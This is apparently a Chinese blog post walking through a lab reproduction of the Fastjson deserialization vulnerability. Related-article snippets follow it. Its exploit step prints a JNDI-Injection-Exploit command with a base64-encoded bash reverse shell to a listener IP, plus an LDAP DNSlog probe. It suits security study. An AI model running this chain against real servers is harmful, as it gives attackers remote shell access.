FASTJSON反序列化(靶场复现)

最新推荐文章于 2024-03-27 14:34:46 发布
最新推荐文章于 2024-03-27 14:34:46 发布
阅读量591 收藏 1
点赞数 1
文章标签: web安全 网络安全 笔记 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66376444/article/details/129982126
版权

一、漏洞信息
1、fastjson介绍:
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

2、漏洞原理:
Fastjson反序列化漏洞被利用的原因,可以归结为两方面:
①Fastjson提供了反序列化功能,允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名;
②Fastjson自定义的反序列化机制会使用反射生成上述指定类的实例化对象,并自动调用该对象的setter方法及部分getter方法。

攻击者可以构造恶意请求,使目标应用的代码执行流程进入这部分特定setter或getter方法,若上述方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。官方采用了黑名单方式对反序列化类名校验,但随着时间的推移及自动化漏洞挖掘能力的提升。新Gadget会不断涌现,黑名单这种治标不治本的方式只会导致不断被绕过,从而对使用该组件的用户带来不断升级版本的困扰。
二、漏洞复现
1.获取子域


2.构造payload

payload:ldap://nddkbc.dnslog.cn


3.在DNSlog网站点击刷新记录,既可以发现一条DNS查询的记录(这里可能存在一些延迟,需要一些时间等待)。发现存在记录的话,就说明存在fastjson反序列化

4.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启LDAP、HTTP服务。这里-A参数是开启LDAP、HTTP服务的ip地址。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zMy82NjY2IDA+JjEK}|{base64,-d}|{bash,-i}' -A 10.10.16.33


5.kali使用nc开启监听

6.重新发送payload

7.成功获取到了shell

wudidaniuniu
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化typecho2靶场漏洞-代码审计全过程(超详细)
qq_59020256的博客
01-28 1094
php· }
Fastjson反序列化漏洞
mingyqf的博客
12-03 415
原文链接:https://blog.csdn.net/Curry197/article/details/125090159Curry197 已于 2022-06-01 21:22:57 修改 2786 收藏 2 分类专栏: 漏洞复现 文章标签: 安全 web安全 网络 版权 漏洞复现 专栏收录该内容 2 篇文章 0 订阅 订阅专栏参考链接:fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)_GeekCoderBrick的博客-CSDN博客_fastjson反序列化漏洞
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
最新发布
人若无名,便可专心练剑
03-27 2018
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
反序列化漏洞靶场
leah126的博客
02-11 1647
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的反序列化链,对收录的所有反序列化链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_反序列化链_RCE1。
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 775
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4314
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
fastjson反序列化利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
JAVA 漏洞靶场 截图 介绍 Name Star [注入漏洞-SQL注入] :glowing_star::glowing_star::glowing_star: [注入漏洞-命令注入] :glowing_star: [注入漏洞-spel表达式注入] :glowing_star::glowing_star::glowing_star: [XSS漏洞] :glowing_star: [CSRF漏洞] :glowing_star::glowing_star: [SSRF漏洞] :glowing_star::glowing_star: [CORS漏洞] :glowing_star::glowing_star::glowing_star::glowing_star: [反序列化漏洞-Fastjson反序列化] :glowing_star::glowing_star::glowing_star::glowing_star: [验证码相关漏洞] :glowing_star::glowing_star: 安装 git clone https://github.com/tangxiaofeng7/Se
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 956
fastjson 阿里巴巴开发的一个JSON解析库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson到底做错了什么?为什么会被频繁爆出漏洞?
热门推荐
HollisChuang's Blog
07-06 2万+
GitHub 15.8k Star 的Java工程师成神之路,不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的真的不来了解一下吗! fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1107
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 456
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
Vulhub复现fastjson漏洞
人若有志,就不会在半坡停止。
11-08 983
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为Java对象,Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 909
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
unserialize入门练习
xiaobai的博客
08-27 1073
知识点 必须知道的魔术方法: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(),当对不可访问属性调用unset()时被调用。 __sleep(),执行serialize(
fastjson反序列化复现
08-12
Fastjson反序列化漏洞是指在反序列化过程中,攻击者可以构造恶意的JSON字符串,通过利用Fastjson的特性和漏洞来执行任意代码。具体的复现过程如下: 1. 构造恶意的JSON字符串,其中包含需要执行的代码。可以利用已知的反序列化漏洞利用链,或者自行构造payload。 2. 将恶意的JSON字符串传入Fastjson反序列化函数,例如`JSON.parseObject(jsonString, targetClass)`。 3. Fastjson反序列化过程中会调用目标类的getter和setter方法,将JSON字符串还原成对象。恶意代码会在这个过程中被执行。 需要注意的是,Fastjson已经在较新的版本中修复了一些已知的反序列化漏洞,并增加了一些安全措施来防御这些漏洞。因此,要成功复现Fastjson反序列化漏洞,需要使用较旧的版本或者找到新的漏洞利用方式绕过这些安全措施。同时,在实际应用中,为了保证安全性,建议使用最新的Fastjson版本,并对输入进行严格的校验和过滤,以防止恶意代码的注入。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【漏洞复现Fastjson反序列化](https://blog.csdn.net/m0_46363249/article/details/122260021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值